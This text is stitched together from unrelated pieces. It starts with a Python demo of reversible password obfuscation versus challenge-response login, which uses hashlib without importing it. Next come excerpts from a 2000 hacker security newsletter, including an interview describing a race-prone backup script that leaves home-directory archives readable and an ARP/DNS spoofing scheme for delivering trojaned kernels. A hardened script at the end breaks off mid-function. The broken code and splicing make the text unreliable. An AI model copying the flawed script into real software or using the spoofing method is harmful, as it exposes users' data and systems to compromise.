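import hmac
import os

# Toy keyless encoding: a stand-in, NOT pcAnywhere's actual algorithm.
# The pad ships inside every client and host, so it is not a secret.
BUILT_IN_PAD = b"constructed-pad-for-this-example"

# Constructed login as it would leave the client (NT user name and password).
CAPTURED_LOGIN = b"EXAMPLE\\jsmith:Winter2000!"


def obfuscate(data: bytes) -> bytes:
    """'Encrypt' with a constant that every installation shares."""
    return bytes(b ^ BUILT_IN_PAD[i % len(BUILT_IN_PAD)] for i, b in enumerate(data))


def deobfuscate(wire: bytes) -> bytes:
    """What the host does, and what anyone holding a copy of the software can do."""
    return obfuscate(wire)  # XOR with a fixed pad is its own inverse


# Keyed alternative (assumption for this example): challenge-response, so the
# password never crosses the wire in any reversible form.

def enroll(password: str, iterations: int = 100_000):
    """Host side: store a salt and a derived key, never the password itself."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, key


def host_challenge() -> bytes:
    """Fresh random nonce per login attempt; this is what defeats replay."""
    return os.urandom(16)


def client_response(password: str, salt: bytes, nonce: bytes,
                    iterations: int = 100_000) -> bytes:
    """Client proves knowledge of the password by keying an HMAC over the nonce."""
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.new(key, nonce, hashlib.sha256).digest()


def host_verify(stored_key: bytes, nonce: bytes, response: bytes) -> bool:
    """Constant-time comparison of the expected and received responses."""
    expected = hmac.new(stored_key, nonce, hashlib.sha256).digest()
    return hmac.compare_digest(expected, response)


def demo():
    """Run both schemes once and report what a passive observer ends up with."""
    wire = obfuscate(CAPTURED_LOGIN)
    salt, key = enroll("Winter2000!")
    nonce = host_challenge()
    response = client_response("Winter2000!", salt, nonce)
    return {
        "keyless_wire_is_readable": deobfuscate(wire) == CAPTURED_LOGIN,
        "keyless_wire_is_replayable": obfuscate(CAPTURED_LOGIN) == wire,
        "keyed_login_accepted": host_verify(key, nonce, response),
        "keyed_replay_accepted": host_verify(key, host_challenge(), response),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The derived key stored on the host is still password-equivalent, and a captured nonce/response pair can be guessed against offline, so this removes passive recovery and replay but does not rescue a weak password.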
@HWA
169.0 [HNS] April 7: NET PRIVACY TOOLS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:46 PM
Microsoft promised free Internet tools based on emerging privacy
standards for controlling how much information people using the Web
reveal.
Link: CNET
http://news.cnet.com/news/0-1005-200-1655289.html?dtn.head
Microsoft plans free Net privacy tools
By The Associated Press Special to CNET News.com
April 7, 2000, 4:50 a.m. PT
TORONTO--Microsoft promised free Internet tools based on emerging privacy
standards for controlling how much information people using the Web
reveal.
Coming from the world's largest software company, the tools could give
impetus for Web sites and other companies to embrace the Platform for
Privacy Practices, or P3P. The World Wide Web Consortium, an Internet
standards group, may finalize P3P this summer.
Richard Purcell, Microsoft's chief privacy officer, said the tools will
help consumers better understand how sites track visits and pass along
information to other parties.
A formal announcement is expected in a few weeks. Purcell disclosed the
company's intent during an interview yesterday at the Computers, Freedom
and Privacy conference here, meeting through today.
People using the Internet are increasingly concerned about Web sites that
create profiles of email addresses, favorite books and clothing sizes for
marketing purposes.
Sites often disclose their intent in privacy statements that are difficult
to find and understand. The Microsoft tools, to be released this fall,
will translate such statements into machine-readable form and let Internet
surfers block access to sites that collect too much.
With the software, people using the Web can state what types of
information they are willing to give, as well as whether they mind sharing
that information with outside parties. Internet surfers will receive a
warning before visiting sites that go beyond that level.
Microsoft plans to make the tools for its browser, Internet Explorer, and
for the competing Netscape browsers.
Lorrie Cranor, who heads a P3P
working group, considered Microsoft's decision important, saying, "In
order for P3P to be widely used, there has to be good user software
available.
"The question I always get is, 'Is Microsoft going to implement it?'" she
said.
Still, critics believe Web sites won't have incentives to join, rendering
such tools and standards meaningless. Jason Catlett, president of
Junkbusters and a critic of P3P, said wide adoption remains years away.
Copyright (c) 2000 Associated Press. All rights reserved. This material may
not be published, broadcast, rewritten, or redistributed.
@HWA
170.0 [HNS] April 7:SECURITY ADDITIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:45 PM
Cisco Systems next week plans to ramp up its VPN security with a new
addition to its PIX firewall line as well as an updated version of its
Secure Policy Manager software for enterprise users.
Link: InfoWorld
http://www.infoworld.com/articles/en/xml/00/04/06/000406enciscofirewall.xml
Cisco plans firewall addition for small businesses
By Cathleen Moore
CISCO SYSTEMS NEXT week plans to ramp up its VPN (virtual private network)
security with a new addition to its PIX firewall line as well as an
updated version of its Secure Policy Manager software for enterprise
users.
The Cisco PIX Firewall 506 will bring a low-end offering aimed at small
businesses and branch offices to the company's existing firewall set.
Other products in the family include the PIX 515, targeted at small and
midsize enterprises, and the Secure PIX 520, which is designed for large
enterprise installations.
With its newest firewall member, Cisco is attempting to tap into small
business environments, which -- with increasing reliance on the Internet
-- are seeking more powerful security solutions for remote access
technologies and VPN. About the size of a hardback, the PIX 506 can handle
throughput of 10Mbps and 3DES encryption at rates of 4Mbps, according to
Cisco. The 506 firewall holds a 200MHz Intel Pentium III processor, 32MB
of RAM, and two integrated Fast Ethernet ports.
Version 2.0 of Cisco Secure Policy Manager adds improved scalability and
additional support for IPsec VPN configurations in Cisco's routers and
firewalls. The Policy Manager lets IT managers define and audit network
security policies from a central location, according to the company. The
product also can simplify deployment of security services supported by
Cisco's firewalls and IOS-based VPN routers, Cisco said.
The Cisco Secure PIX Firewall 506 will be available in May, priced
starting at $1,950. The Secure Policy Manager 2.0 will begin shipping this
month, priced at $7,500.
Cisco Systems Inc., in San Jose, Calif., is at www.cisco.com.
Cathleen Moore is an InfoWorld reporter.
@HWA
171.0 [HNS] April 7:COOKIES
~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:43 PM
You say you don't like browser cookies? You're not quite sure if that
program you download from the Net is revealing more about you than it
should? Wired has an article about it and we had a discussion on them
on our forum.
Link: Wired on cookies
Link: HNS forum
http://www.wired.com/news/politics/0,1283,35498,00.html
http://default.net-security.org/phorum/read.php3?num
Getting Snooped On? Too Bad
by Declan McCullagh 3:00 a.m. Apr. 7, 2000 PDT
TORONTO -- You say you don't like browser cookies? You're not quite sure
if that program you download from the Net is revealing more about you than
it should?
Well, here's something to make you really nervous: In the United States,
it may be illegal to disable software that snoops on you.
The folks who came up with this idea turn out to be the large corporations
that helped to draft the Digital Millennium Copyright Act (DMCA), which
restricts some forms of tampering with copyright protection devices.
In some cases, that means you won't be able to turn off any surveillance
features it might include, according to participants in a Thursday
afternoon panel at the Computers, Freedom and Privacy conference.
"Privacy circumvention is possible only under a limited circumstance,"
said Paul Schwartz of the Brooklyn Law School.
As more and more copyrighted material makes its way online, content owners
are turning to encryption to protect their works from widespread illicit
redistribution.
Stephen King distributed his recent novel online in encrypted form, and
music companies are backing Secure Digital Memory Card for audio players.
Privacy advocates fret that if future works are secure and thus protected
under the DMCA, they could reveal consumers' private behavior --
RealNetworks' RealJukebox player secretly did just that -- and tinkering
with the program to turn off the reporting mechanism would be illegal.
"The practical impact is it's another area we're going to be fighting
about," Schwartz said.
The DMCA, which became law in October 1998, does allow some very limited
forms of privacy circumvention. You're allowed to do it if the software
leaks "personally identifying information" about you without giving you
the ability to say no, and if you're not "in violation of any other law."
But here's the rub: Many, if not most, programs include shrink-wrap
licenses that prohibit reverse-engineering or altering the program.
Some courts have said that shrink-wrap licenses -- software license
agreements that don't require a signature -- are binding. If you violate
them, would you be able to take advantage of the DMCA's
privacy-circumvention loophole?
The answer may well be yes. "The statute is basically totally incoherent,"
says Pam Samuelson, a professor at the University of California at
Berkeley and an influential copyright scholar.
"We're getting tortured by laws that are inherently incoherent,"
complained Barry Steinhardt, associate director of the ACLU.
Violating the DMCA is a civil offense, and "willfully" violating it for
private financial gain is a criminal offense punishable by five years in
jail and a $500,000 fine.
@HWA
172.0 [HNS] April 7:SECURE E-MAIL SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:39 PM
The Royal Mail has launched a secure e-mail service through its secure
technology service, ViaCode.
Link: Silicon.com
http://www.silicon.com/public/door?REQUNIQ
@HWA
173.0 [HNS] April 7:ONLINE MUGGERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:38 PM
"You are running a Web site. Making money perhaps, and visitors are
seeing your message. Then, according to your perimeter
intrusion-detection device, some online goofball or criminal hacker is
beating on your door. What are you going to do?" Read Winn Schwartau's
article.
Link: IDG.net
http://www.idg.net/servlet/ContentServlet?global_doc_id
Url was eaten by an AOL hax0r or some shit
@HWA
174.0 [HNS] April 6:SURVEY BY DTI
~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Thursday 6 April 2000 on 3:00 PM
British companies are too complacent when it comes to Internet
security and only have themselves to blame if their IT systems are
compromised by hackers. That is one of the conclusions published by
Department of Trade and Industry. Contributed by Lady Sharrow.
Link: The Register
http://www.theregister.co.uk/000406-000023.html
Dead url
@HWA
175.0 [HNS] April 6: COMPUTER CODES PROTECTED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Thursday 6 April 2000 on 1:58 PM
Computer programs used to scramble electronic messages are protected
by the First Amendment because those codes are a means of
communication among programmers, a federal appeals court ruled
Tuesday.
Link: Associated Press
http://www.worldnews.com/?action
Bad url
@HWA
176.0 [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Thursday 6 April 2000 on 1:57 PM
A 50-year-old man has been released on police bail after being
questioned by detectives investigating the disappearance of the Enigma
encoding machine.
Link: BBC
http://news.bbc.co.uk/hi/english/uk/newsid_701000/701877.stm
Wednesday, 5 April, 2000, 12:53 GMT 13:53 UK
Man released after code machine theft
[Image: Bletchley Park: Centre for wartime code-breaking effort]
A 50-year-old man has been released on police bail after being questioned
by detectives investigating the disappearance of the Enigma encoding
machine. The man, from Bedfordshire, was arrested on Tuesday and
released after questioning at Milton Keynes police station.
Police have mounted a massive search for the historic machine, which
cracked the Nazi Enigma code during the Second World War.
It was stolen in broad daylight from a glass cabinet at the Bletchley Park
museum on Saturday, where it was on display.
Police officers were preparing to trawl a lake on the estate and search
the mansion.
Thames Valley Police spokesman John Brett said: "A search of the mansion
and the grounds of Bletchley Park will start under the supervision of a
police search adviser and a team of 10 police officers.
[Image: The missing Enigma machine]
"There is a possibility that a Thames Valley Police underwater search unit
may be used to search the lake in Bletchley Park.
"It could be hidden under the stairs in the mansion, there are lots of
places it could be."
Detectives think the thief could have abandoned the Enigma machine within
the 50-acre grounds of the estate, or in one of the 70 rooms in the
mansion.
The museum in Milton Keynes, Buckinghamshire, was raided in full view of
visitors during an open day on Saturday.
The Enigma - one of only three in the world - is worth up to £100,000 and
was used by the Germans to encrypt messages sent during the Second World
War.
Bletchley Park is believed to have shortened the war by cracking the code.
Detectives were appealing for any visitors on Saturday who took pictures
or video footage to contact police in the hope they might identify the
thief.
Reward offered
Mr Brett urged whoever stole the machine not to be tempted to destroy the
evidence in the light of massive publicity.
He added: "If it's a prank that's gone wrong, don't destroy it because our
main priority is getting it back."
A £5,000 reward is being offered by BT, owners of part of the site in
Milton Keynes since World War II.
"It is a tragedy that the machine has been stolen," Alan White, director
of BT's property division, said.
@HWA
177.0 [HNS] April 6:CYBERPATROL BLOCK LIST
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Thursday 6 April 2000 on 1:36 PM
Our affiliates at Security Watch wrote that a list of thousands of
hosts, websites and Usenet groups blocked by Microsystems Software
Inc.'s CyberPatrol software has been published on the web.
Link: Security Watch
http://www.securitywatch.com/scripts/news/list.asp?AID
skull fucked url
@HWA
178.0 [HNS] April 5:CRYPTO REGULATIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 5 April 2000 on 12:27 PM
Privacy advocates won a preliminary victory when for the second time a
federal appeals court questioned restrictions on data-scrambling
encryption software.
Link: Wired
http://www.wired.com/news/politics/0,1283,35425,00.html
Crypto Regs Challenged Again
by Declan McCullagh
4:00 p.m. Apr. 4, 2000 PDT
Privacy advocates won a preliminary victory when for the second time a
federal appeals court questioned restrictions on data-scrambling
encryption software.
The Sixth Circuit Court of Appeals suggested Monday that President
Clinton's restrictions on distributing encryption products might be
unconstitutional.
"Because computer source code is an expressive means for the exchange of
information and ideas about computer programming, we hold that it is
protected by the First Amendment," a three-judge panel said in a unanimous
17KB decision.
That decision reversed a July 1998 ruling by a federal district court.
And while the panel did not strike down the Clinton administration's
regulations, it did refer the matter back to U.S. District Judge James
Gwin for another hearing. Earlier Gwin had ruled the First Amendment did
not apply.
The Justice Department says source code is akin to instructions for a
machine, and rules governing its distribution are necessary for national
security reasons.
Now that the appeals court has ruled source code is protected by the First
Amendment, the government will have a much tougher time arguing it should
have the power to imprison a law professor for posting a book on his
website.
Peter Junger, a professor at Case Western University School of Law, sued
the federal government after it told him he needed a license to post a
chapter of his Computers and the Law textbook online.
The American Civil Liberties Union, which represents Junger, applauded the
ruling.
"This is a great day for programmers, computer scientists and all
Americans who believe that privacy and intellectual freedom should be free
from government control," said ACLU Legal Director Raymond Vasvari.
In a separate case that also challenges the criminal penalties the U.S.
government imposes for unauthorized encryption distribution, the 9th U.S.
Circuit Court of Appeals in May 1999 ruled that encryption source code was
speech protected by the First Amendment.
"We conclude that the challenged regulations allow the government to
restrain speech indefinitely with no clear criteria for review," the 9th
Circuit panel said in its decision in a case brought by math professor
Daniel Bernstein.
But it's not clear what happens next in either the Junger or Bernstein
cases. The Clinton administration relaxed the regulations in January, and
the move is likely to delay both lawsuits for some time.
In fact, the Commerce Department, which administers the regulations, says
that Bernstein no longer has anything to worry about.
"You ask for an advisory opinion in light of your concern that the new
regulations 'continue to interfere with Professor Bernstein's planned
scientific activities.' Your concerns are unfounded," a Commerce
Department Bureau of Export Administration official wrote to Bernstein's
lawyers in February.
Bernstein asked in March for a rehearing by the district court to take
into account the regulation changes.
@HWA
179.0 [HNS] April 5:GFI AND NORMAN TEAM UP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 5 April 2000 on 12:24 PM
GFI and Norman have teamed up to integrate the Norman Virus Engine
with GFI's e-mail security gateway, Mail essentials.
Link: ESJ
http://www.esj.com/breaknewsdisp.asp?ID
br0ked url
@HWA
180.0 [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 5 April 2000 on 12:23 PM
MasterCard has taken the unusual step of offering a free virus repair
service as a key feature in its small business card package.
Link: Computer Currents
http://www.currents.net/newstoday/00/04/05/news5.html
@HWA
181.0 [HNS] April 5: BUFFER OVERFLOWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 5 April 2000 on 3:12 AM
In a survey held amongst readers of the security/vulnerability report
list "Bugtraq" a few months ago, approximately 2/3 of the respondents
thought the so-called "buffer overflows" to be the dominating security
problem. Read the new Default article, which deals with buffer overflows.
Link: Default
http://net-security.org/default/articles/09/02.shtml
@HWA
182.0 [HNS] April 5: PIRACY
~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 5 April 2000 on 12:11 AM
Washington state, with an economy that has boomed along with
Microsoft's, has launched a crackdown on state employees who illegally
circulate pirated software on government computers.
Link: APB News
http://www.apbnews.com/newscenter/internetcrime/2000/04/04/software0404_01.html
@HWA
183.0 [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 5 April 2000 on 12:05 AM
Certicom's ECC2k-108 Elliptic Curve Discrete Logarithm challenge has
been broken! This was the largest public calculation ever to use a
complex parallel algorithm. $5,000 dollars in winnings will be donated
to the Free Software Foundation.
Link: Slashdot
http://slashdot.org/article.pl?sid
@HWA
184.0 [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 5 April 2000 on 12:02 AM
Continuing its California courtroom battle against the Digital Video
Disk industry over DVD encryption codes, the Electronic Frontier
Foundation has appealed an injunction granted against more than 50 Web
site operators in January.
Link: Computer User
http://www.currents.net/newstoday/00/04/04/news7.html
@HWA
185.0 [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 5 April 2000 on 12:01 AM
The North Atlantic Treaty Organization has launched a full-scale
investigation into how one of its top-secret documents ended up posted
on the Internet. The Sunday Telegraph reports that an unknown virus is
to blame for the posting of the nine-page document, detailing the
alliance's rules of engagement in the southern Yugoslav province of
Kosovo, on to the Net.
Link: Computer User
http://www.currents.net/newstoday/00/04/04/news3.html
@HWA
186.0 [HNS] April 4: FIGHT SPAM WITH SPAM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 4 April 2000 on 8:40 AM
Cisco Systems is urging victims of spam to take the law into their own
hands and deliver their own form of vengeance to combat unwanted
e-mails. This was taken from the booklet 'The Easy Guide to Network
Security', which could be downloaded from their UK site.
Link: The Register
http://www.theregister.co.uk/000404-000001.html
@HWA
187.0 [HNS] April 4:REALPLAYER BUFFER OVERFLOW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 4 April 2000 on 8:10 AM
There is a buffer overflow in the Win32 RealPlayer Basic client,
versions 6 and 7. This appears to occur when >299 characters are
entered as a 'location' to play, such as http://aaaaa..... with 300
a's. If it is embedded in an HTML page, Internet Explorer also crashes.
Link: Bugware
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid954828462,32898,
@HWA
188.0 [HNS] May 31st:NO PROBLEMS?
~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 6:46 PM
Microsoft says there are no problems with its e-mail software, even as
computer experts have come out in support of an Auckland software
designer who says its e-mail programs are dangerously flawed.
Link: NZ Herald
http://www.nzherald.co.nz/storydisplay.cfm?storyID
@HWA
189.0 [HNS] May 31:MS SECURITY BULLETIN #38
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 6:41 PM
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft Windows Media Encoder, which ships as
a component of the Windows Media Technologies. The vulnerability could
allow a malicious user to interfere with a digital content provider's
ability to supply real-time audio and video broadcasts.
Link: Read the advisory
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid959791139,28208,
@HWA
190.0 [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 31 May 2000 on 5:49 PM
The service gives European companies the opportunity to outsource
network intrusion detection instead of relying on internal security
experts. Defcom showed off its flagship European "alarm centre" in
Stockholm Monday -- from which a company's network security can be
remotely monitored - and said that similar centres are currently being
tested in London and Berlin, and will be operational there after the
summer.
Link: ZDNet UK
http://www.zdnet.co.uk/news/2000/21/ns-15659.html
@HWA
191.0 [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 31 May 2000 on 5:48 PM
The Senate this month urged the Pentagon to study how it might use the
Army National Guard to make up for the shortage of computer
programmers and information security specialists.
Link: IDG
http://www.idg.net/ic_184044_1794_9-10000.html
@HWA
192.0 [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 31 May 2000 on 5:46 PM
Package: xlockmore-4.16 and earlier
The xlock program locks an X server until a valid password is entered.
The command line option -mode provides a user with a mechanism to
change the default display shown when the X server is locked. xlock is
installed with privileges to obtain password information, although
these are dropped as early as possible. An overflow in the -mode
command line option allows a malicious attacker to reveal arbitrary
portions of xlock's address space including the shadow password file.
Link: Linux Today
http://linuxtoday.com/news_story.php3?ltsn
@HWA
193.0 [HNS] May 31:NAI ON VBS FIREBURN WORM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:37 PM
This is a VBS mass-mailing worm that uses Microsoft Outlook and mIRC
to propagate. This worm is a VBS program that is sent to all users in
the victim's address book and is attached to an email with varying
subject lines, depending on the language version of the host system
which sent the message. This worm contains a date activated payload
which disables the keyboard and mouse on June 20th.
Link: NAI advisory
http://vil.nai.com/villib/dispvirus.asp?virus_k
@HWA
194.0 [HNS] May 31:INTERNET GUARD DOG PRO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:35 PM
Last week McAfee Retail Software, a division of Network Associates,
Inc., announced McAfee Internet Guard Dog Pro, an all-in-one solution
containing a personal firewall and parental controls to keep children
safe while online.
Link: Press Release
http://net-security.org/cgi-bin/press/fullnews.cgi?newsid959697420,11489,
@HWA
195.0 [HNS] May 31: FRANK VAN VLIET INTERVIEW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:34 PM
LinuxSecurity.com has an interview with Frank van Vliet aka {}, the
author of AuditFile and the man who recently pointed out
configuration errors on apache.org.
Link: LinuxSecurity.com
http://www.linuxsecurity.com/feature_stories/feature_story-47.html
Linux Security Interview with Frank van Vliet By Benjamin D. Thomas
5/30/2000 16:20
Frank van Vliet is the author of AuditFile, many security advisories, and
recently pointed out configuration errors on apache.org.
We thought our readers would be interested in an interview with Frank van
Vliet because of the recent paper he and Peter van Dijk released outlining
the steps they took to compromise apache.org. Their paper does not point
out any new vulnerabilities, it merely shows how simple configuration
errors can leave a system susceptible to attack. In this interview Frank
explains how he audits a system's security, major pitfalls administrators
fall into, and how he attempts to uncover bugs. We believe that everyone
can learn something from this interview. Note: Frank uses the alias {}.
LinuxSecurity: When and how did you gain interest in security? How did you
gain your security knowledge?
Frank: When I finally switched from Windows to Linux, I spent a lot of
time studying the Linux kernel source. When I finished that one I knew C
enough to start coding on my own. I started working on my first security
project called Auditfile, a kernel patch making it possible to restrict
file access per process or per binary. This enabled me to run my apache
webserver only allowing it to read default libraries (/lib/*, /usr/lib/*),
read its configuration files, htdocs (wwwroot) directory, and only
allowing it to write to logfiles with no further access. At the same time
I took over control of the security focused group RooT66
http://root66.nl.eu.org and I joined ShellOracle
http://www.shelloracle.org. I spent hours reading various texts and joined
Buffer0verfl0w security http://b0f.freebsd.lublin.pl I also got involved
with projects like SecNet http://irc.secnet.org (not finished when writing
this). I have done some freelance security jobs for small webhosters.
LinuxSecurity: When attempting to audit a system's security, what procedure
do you follow? Where do you begin? How do you normally gather information?
What comes next?
Frank: My approach changes as I gain more knowledge. Currently when
checking the security of a system, I start checking the file system (what
files are suidroot or suidgroup, what files are accessible for what groups,
what files are world writable, are there any files with nonpublic
information world readable). Next, I try to find out what processes are
running as root. Of course the suid root processes are but there are also
crontabs or administrators around running binaries so I wrote some tools
live monitoring the processes running as root. When having a list of
binaries run as root, I start checking every binary. Are there any known
security flaws in it? Are its configuration files and data files
accessible by nonroot? If nothing and I am really in the mood and the
binary isn't too big I would download the source of it (I really love
open-source) and read it to see if I can find any bugs in it.
LinuxSecurity: What are some of the major pitfalls Linux Administrators
fall into?
Frank: It is never enough to download all patches and updates and run
latest versions of your software. The group Buffer0verfl0w Security I am
in is constantly searching for new bugs in software.
Most admins play with things themselves and forget permissions on files or
other configuration faults. These things can be like the following backup
script:
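#!/bin/bash
# Archives are created in the current directory under the default umask
# and only moved afterwards; this is the behaviour discussed below.
for file in /home/*
do
  name=`echo $file | sed -e 's/\/home\///'`
  tar -czf $name.tar.gz $file
  mv $name.tar.gz /verysecuredirectory/backups
done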
Which means every home directory will be compressed into targz files in
the local directory then they got moved to the
/verysecuredirectory/backups. But because most umasks aren't set to make
new files 600 and most of the times it makes new files world readable, an
attacker can gain all directories in /home if it just scans most common
directories the root is in for .tar.gz files and very fast copies most of
it to his own directories before the scripts move it (most of the time
this is while it is still compressing into that tar.gz file and it is
already readable).
Besides those race condition bugs like the previous ones, there are also
administrators that store backups in world readable.
And there are always the 'can I trust my network' things. Man in the
middle attacks are not very common but are very easy to perform,
especially when at the same network segment as the box you attack (could
be some other way more insecure box previously hacked). In worst case an
attacker on the same segment could broadcast arp who-has packets with the
ip of the nameserver the attacked box is using has the MAC address of my
NIC. That would mean when the attacked box would try to access the
nameserver, it will instead contact the box of the attacker and send its
name resolving questions. Then the attacker can just reply normally except
for the kernel.org domain and have those names resolve to the ip of the
box of the attacker. Then have it set up just the same ftpserver as on any
other ftp kernel.org box and have it search trojaned Linux kernels and
then just wait for a new Linux kernel to be published.
LinuxSecurity: Have you exposed any other vulnerabilities, or written any
programs related to security?
Frank: Well, I wrote auditfile (still working on a newer version, as
always) I mentioned in the beginning of this interview that is at
http://root66.nl.eu.org/karin/auditfile-1.00.tar.gz. I found a bug and
wrote an exploit for bugzilla http://bugzilla.mozilla.org and working on
some other exploits and tools at the moment.
LinuxSecurity: How do you normally approach finding security
vulnerabilities and writing code to exploit them?
Frank: Every language has its own sets of common bugs the programs can
have.
For C/C++ they are mostly buffer overflows. The only way to find them is to
check every buffer in the program and search for any functions done on
that buffer and check everything if there is a possibility to exploit it.
I wrote some perl scripts to automate a part of this task which I normally
use to find the buffers, sizes of those buffers and possible insecure
functions (like strcpy and sprintf) done on those buffers, saving me a lot
of time finding normal overflows. The tricky ones require reading from
line 1 to like $ (last line).
For Perl it is most of the time system or open functions that can be used
to execute commands (like system(finger $user) or open($user) where the
attacker can set the $user variable). So I normally search for all open,
system (system, exec, `, and so on) functions and check arguments to them.
Also database functions can be insecure.
I know people sending random feeds to their sendmail daemon and catch
crashes then backtrace to see what feed caused it and then work their way
back from there to the bug. Perhaps someday when I am that desperate to
find a bug in some high profile software I would do a thing like that,
until then I just read and most of the time you also learn by reading.
LinuxSecurity: What do you feel is the most important step in keeping a
network secure?
Frank: The integrity of the network can be spoiled if only one of the
boxes on the network got compromised by a nontrusted person. Most networks
get compromised because only one insecure box was on the network.
Administrators may want to consider an Intrusion Detection System to
monitor all machines on a network.
The most important step to keep a network secure is to keep all hosts
secure, this can be done by restricting as much as possible from outside
to the network (like only http connections to the httpserver and only ftp
connections to the ftpserver and so on) and having an IDS monitoring
network traffic.
LinuxSecurity: What do you think the most common Linux security
vulnerability is? How would you recommend an administrator fix this?
Frank: The possibility of easy exploiting of buffer overflows. Most buffer
overflows can be stopped by patches like the nonexecutable stack
(http://www.openwall.com/linux and packetstorm to see my 2.3.99-pre5
version of it) patch for the Linux kernel and compiler addons like
stackguard.
LinuxSecurity: Do you think open-source software has the potential for
being more or less secure than closed-source software?
Frank: There are two sides to this story, if the same program was
available in both open and close sourced version. They are insecure at the
same rate. But because you get the source code of the open-source program
it is very easy to search for bugs. Then two things happen. The bugs get
reported and exploits are made for those bugs. This makes the open source
program having less bugs than the same closed source program but also
there are more exploits around and there will be more bugs to be found in
the future. This doesn't say it is impossible to disassemble the closed
source program and find the bugs in that one too. Then the same happens
for the close source version but at a slower rate because the source is
harder to get and to read (would be ASM instead of easy C or some other
fancy language).
Open source software is more secure than closed source because good coders
can use disassembling techniques on closed source programs to find
vulnerabilities. I would rather have the open source version so it can
be compiled with stackguard.
LinuxSecurity: What do you think motivates "black hats" to damage/destruct
systems?
Frank: It is the kick of gaining access and power motivating the "black
hats" to hack systems. The damage and destruct is most of the times done
in 2 parts. One part is to make sure they keep their full access and so
most binaries are Trojan and so on. This can be because they are mad at
the company they just hacked (they wouldn't pay them for revealing the
security bugs they exploited or some other in my opinion lame reason) or
just because they really don't care and just want to show off (like the
recent DDS attacks).
LinuxSecurity: How do you feel about the mass-media's portrayal of
'hacking'?
Frank: Most media focuses on the things done by stupid kids mass attacking
big servers with DDS networks or doing other stupid things. This does take
the heat off the real hackers. The real hackers that don't hack and don't
want to be disturbed at their work of endless coding and tracing through
programs. It was because Hardball and I wanted to make a statement about
consideration of configuration. The media got us a little attention, we
would still be unknown doing endless coding.
LinuxSecurity: What do you see is in the future for information security?
Frank: I would love to see administrators think twice before installing
things on their boxes. Also, having kids on your company network is the
last thing you want, especially when they try to trojan your sshdaemon and
mess up making some boxes even unusable and forcing to full reinstall of
everything because you don't know what was trojanned and what was not.
LinuxSecurity: We would like to take a moment to thank Frank for taking
time out of his busy schedule to share some of his experiences with us. If
you have any questions regarding this interview, please feel free to drop
us an email. As always, if you have any ideas for other interviews, or any
suggestions, please let us know. We want to serve you!
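The backup-script race Frank describes in the interview above, shown in a
hardened form. This is an added example, not part of the interview or of
LinuxSecurity's text; the function names backup_homes and readable_archives
and the staging-directory layout are assumptions made for the illustration.
It also covers his second point by listing archives left readable by group
or others.

```shell
#!/bin/sh
# Added example: hardened form of the per-home backup loop.
# backup_homes and readable_archives are illustrative names, not from the
# interview. Source and destination are arguments so the script can be
# tried on a scratch tree instead of /home.

# backup_homes SRC_ROOT DEST
# Archives every directory under SRC_ROOT into DEST/<name>.tar.gz.
backup_homes() {
    (
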